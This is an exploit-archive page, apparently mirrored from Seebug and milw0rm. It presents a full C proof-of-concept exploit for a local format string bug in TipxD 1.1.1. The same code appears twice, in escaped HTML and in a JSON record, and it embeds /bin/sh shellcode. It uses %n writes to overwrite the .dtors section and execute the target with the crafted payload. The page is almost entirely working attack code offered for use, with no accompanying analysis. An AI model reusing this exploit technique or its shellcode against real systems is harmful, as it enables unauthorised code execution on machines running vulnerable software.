Search...

TipxD <= 1.1.1 - Local Format String Vulnerability (not setuid)

2014-07-01T00:00:00

ID SSV:62943
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                /* tipxd_exp.c

TipxD Format String Vulnerability

TipxD &#60;= 1.1.1 local exploit (Proof of Concept)

Tested in Slackware 9.0 / 9.1 / 10.0

by CoKi &#60;coki@nosystem.com.ar&#62; - SECU
No System Group - http://www.nosystem.com.ar
*/

#include &#60;stdio.h&#62;
#include &#60;string.h&#62;

#define PATH &#34;/bin/tipxd&#34;
#define OBJDUMP &#34;/usr/bin/objdump&#34;
#define GREP &#34;/usr/bin/grep&#34;

unsigned char shellcode[]= /* aleph1 shellcode.45b */
&#34;\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c&#34;
&#34;\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb&#34;
&#34;\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e&#34;
&#34;\x2f\x73\x68&#34;;

int check(unsigned long addr);

int main(int argc, char *argv[]) {

int i, dtorsaddr;
unsigned int bal1, bal2, bal3, bal4;
char temp[512];
char buffer[1024];
char nop1[255], nop2[255];
char nop3[255], nop4[255];
int cn1, cn2, cn3, cn4;
FILE *f;
char *env[3] = {shellcode, NULL};
int shaddr = 0xbffffffa - strlen(shellcode) - strlen(PATH);

/* finding .dtors address */
sprintf(temp, &#34;%s -s -j .dtors %s | %s ffffffff&#34;, OBJDUMP, PATH, GREP);
f = popen(temp, &#34;r&#34;);
if(fscanf(f, &#34; %08x&#34;, &dtorsaddr) != 1) {
pclose(f);
printf(&#34;Cannot find .dtors address\n&#34;);
exit(1);
}
pclose(f);
dtorsaddr = dtorsaddr + 4;

printf(&#34;\n TipxD &#60;= 1.1.1 local exploit (Proof of Concept)\n&#34;);
printf(&#34; by CoKi &#60;coki@nosystem.com.ar&#62;\n\n&#34;);
printf(&#34; shellcode address = %.8p\n&#34;, shaddr);
printf(&#34; .dtors address = %.8p\n\n&#34;, dtorsaddr);

bzero(temp, sizeof(temp));
bzero(buffer, sizeof(buffer));

strcat(buffer, &#34;x&#34;);

/* adding .dtors address */
for(i = 0; i &#60; 4; i++) {
bzero(temp, sizeof(temp));
sprintf(temp, &#34;%s&#34;, &dtorsaddr);
strncat(buffer, temp, 4);
dtorsaddr++;
}

/* convert shellcode address location */
memset(nop1, 0, 255);
memset(nop2, 0, 255);
memset(nop3, 0, 255);
memset(nop4, 0, 255);

bal1 = (shaddr & 0xff000000) &#62;&#62; 24;
bal2 = (shaddr & 0x00ff0000) &#62;&#62; 16;
bal3 = (shaddr & 0x0000ff00) &#62;&#62; 8;
bal4 = (shaddr & 0x000000ff);

cn1 = bal4 - 16 - 15 - 48 - 2 -1;
cn1 = check(cn1);
cn2 = bal3 - bal4 - 2;
cn2 = check(cn2);
cn3 = bal2 - bal3 - 2;
cn3 = check(cn3);
cn4 = bal1 - bal2 - 2;
cn4 = check(cn4);

memset(nop1, &#39;\x90&#39;, cn1);
memset(nop2, &#39;\x90&#39;, cn2);
memset(nop3, &#39;\x90&#39;, cn3);
memset(nop4, &#39;\x90&#39;, cn4);

sprintf(temp, &#34;%%08x%%08x%%08x%%08x%%08x%%08x&#34;
&#34;%s\xeb\x02%%n&#34;
&#34;%s\xeb\x02%%n&#34;
&#34;%s\xeb\x02%%n&#34;
&#34;%s\xeb\x02%%n\x90\x90\x90\x90&#34;
,nop1, nop2, nop3, nop4);

strcat(buffer, temp);

execle(PATH, &#34;tipxd&#34;, &#34;-f&#34;, buffer, NULL, env);
}

int check(unsigned long addr) {
char tmp[128];
snprintf(tmp, sizeof(tmp), &#34;%d&#34;, addr);
if(atoi(tmp) &#60; 1)
addr = addr + 256;

return addr;
}

// milw0rm.com [2004-12-14]

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-62943", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "TipxD <= 1.1.1 - Local Format String Vulnerability (not setuid)", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-62943", "cvelist": [], "description": "No description provided by source.", "viewCount": 3, "published": "2014-07-01T00:00:00", "sourceData": "\n /* tipxd_exp.c\r\n\r\nTipxD Format String Vulnerability\r\n\r\nTipxD <= 1.1.1 local exploit (Proof of Concept)\r\n\r\nTested in Slackware 9.0 / 9.1 / 10.0\r\n\r\nby CoKi <coki@nosystem.com.ar> - SECU\r\nNo System Group - http://www.nosystem.com.ar\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n\r\n#define PATH "/bin/tipxd"\r\n#define OBJDUMP "/usr/bin/objdump"\r\n#define GREP "/usr/bin/grep"\r\n\r\nunsigned char shellcode[]= /* aleph1 shellcode.45b */\r\n"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c"\r\n"\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb"\r\n"\\x89\\xd8\\x40\\xcd\\x80\\xe8\\xdc\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e"\r\n"\\x2f\\x73\\x68";\r\n\r\nint check(unsigned long addr);\r\n\r\nint main(int argc, char *argv[]) {\r\n\r\nint i, dtorsaddr;\r\nunsigned int bal1, bal2, bal3, bal4;\r\nchar temp[512];\r\nchar buffer[1024];\r\nchar nop1[255], nop2[255];\r\nchar nop3[255], nop4[255];\r\nint cn1, cn2, cn3, cn4;\r\nFILE *f;\r\nchar *env[3] = {shellcode, NULL};\r\nint shaddr = 0xbffffffa - strlen(shellcode) - strlen(PATH);\r\n\r\n/* finding .dtors address */\r\nsprintf(temp, "%s -s -j .dtors %s | %s ffffffff", OBJDUMP, PATH, GREP);\r\nf = popen(temp, "r");\r\nif(fscanf(f, " %08x", &dtorsaddr) != 1) {\r\npclose(f);\r\nprintf("Cannot find .dtors address\\n");\r\nexit(1);\r\n}\r\npclose(f);\r\ndtorsaddr = dtorsaddr + 4;\r\n\r\nprintf("\\n TipxD <= 1.1.1 local exploit (Proof of Concept)\\n");\r\nprintf(" by CoKi <coki@nosystem.com.ar>\\n\\n");\r\nprintf(" shellcode address = %.8p\\n", shaddr);\r\nprintf(" .dtors address = %.8p\\n\\n", dtorsaddr);\r\n\r\nbzero(temp, sizeof(temp));\r\nbzero(buffer, sizeof(buffer));\r\n\r\nstrcat(buffer, "x");\r\n\r\n/* adding .dtors address */\r\nfor(i = 0; i < 4; i++) {\r\nbzero(temp, sizeof(temp));\r\nsprintf(temp, "%s", &dtorsaddr);\r\nstrncat(buffer, temp, 4);\r\ndtorsaddr++;\r\n}\r\n\r\n/* convert shellcode address location */\r\nmemset(nop1, 0, 255);\r\nmemset(nop2, 0, 255);\r\nmemset(nop3, 0, 255);\r\nmemset(nop4, 0, 255);\r\n\r\nbal1 = (shaddr & 0xff000000) >> 24;\r\nbal2 = (shaddr & 0x00ff0000) >> 16;\r\nbal3 = (shaddr & 0x0000ff00) >> 8;\r\nbal4 = (shaddr & 0x000000ff);\r\n\r\ncn1 = bal4 - 16 - 15 - 48 - 2 -1;\r\ncn1 = check(cn1);\r\ncn2 = bal3 - bal4 - 2;\r\ncn2 = check(cn2);\r\ncn3 = bal2 - bal3 - 2;\r\ncn3 = check(cn3);\r\ncn4 = bal1 - bal2 - 2;\r\ncn4 = check(cn4);\r\n\r\nmemset(nop1, '\\x90', cn1);\r\nmemset(nop2, '\\x90', cn2);\r\nmemset(nop3, '\\x90', cn3);\r\nmemset(nop4, '\\x90', cn4);\r\n\r\nsprintf(temp, "%%08x%%08x%%08x%%08x%%08x%%08x"\r\n"%s\\xeb\\x02%%n"\r\n"%s\\xeb\\x02%%n"\r\n"%s\\xeb\\x02%%n"\r\n"%s\\xeb\\x02%%n\\x90\\x90\\x90\\x90"\r\n,nop1, nop2, nop3, nop4);\r\n\r\nstrcat(buffer, temp);\r\n\r\nexecle(PATH, "tipxd", "-f", buffer, NULL, env);\r\n}\r\n\r\nint check(unsigned long addr) {\r\nchar tmp[128];\r\nsnprintf(tmp, sizeof(tmp), "%d", addr);\r\nif(atoi(tmp) < 1)\r\naddr = addr + 256;\r\n\r\nreturn addr;\r\n}\r\n\r\n// milw0rm.com [2004-12-14]\r\n\n ", "id": "SSV:62943", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T16:55:45", "reporter": "Root", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2017-11-19T16:55:45", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T16:55:45", "rev": 2}, "vulnersScore": -0.1}, "references": []}

TipxD &lt;= 1.1.1 - Local Format String Vulnerability (not setuid)

Description

No description provided by source.

TipxD <= 1.1.1 - Local Format String Vulnerability (not setuid)